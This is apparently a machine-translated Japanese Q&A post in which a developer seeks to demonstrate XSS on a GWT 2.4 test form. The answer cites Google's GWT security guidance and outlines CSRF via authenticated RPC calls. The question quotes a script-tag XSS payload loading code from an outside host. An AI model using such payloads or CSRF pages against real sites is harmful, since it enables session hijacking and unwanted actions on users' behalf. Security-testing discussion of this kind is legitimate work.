GWT (V2.4.0) を介したサンプル xss 攻撃のデモを探していました。html テキスト領域と送信ボタンを含むフォーム (GET メソッド) を作成しました。送信時に、xss がある場合は gwt rpc を介してサーバーを呼び出します。脆弱性、サンプル テスト ケース//<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> //
をフィルター処理しないでください。しかし、これは機能しません。xss 攻撃の実行方法を共有してもらえますか? 概要や要点だけでも構いません。
1 に答える
https://developers.google.com/web-toolkit/articles/security_for_gwt_applications#xssを見てください。
内部 HTML を使用して攻撃を開始する方法の例があります。セクションを参照
innerHTML を設定するコード
ページ上でも対策を示しています。
XSRF について話している場合は、提案されているように
クロスサイト リクエスト フォージェリ (XSRF または CSRF) は、攻撃者がユーザーの知らないうちに認証されたユーザーに代わってアクションを実行できる Web 攻撃の一種です。通常、悪意のある HTML ページを作成し、被害者がこのページにアクセスすると、被害者のブラウザがサードパーティのドメインに対して攻撃者が制御するリクエストを発行するようにします。被害者がサードパーティのドメインで認証されている場合、リクエストはそのドメインのブラウザの Cookie とともに送信され、被害者に代わって被害者の同意なしに望ましくないアクションを引き起こす可能性があります。たとえば、ブログの削除または変更などです。またはメール転送ルールを追加します。
(認証されていない) rpc 要求を送信するページを作成するだけで、ブラウザが認証済みのユーザーの Cookie を渡し、rpc 呼び出しが成功すれば、攻撃は機能します。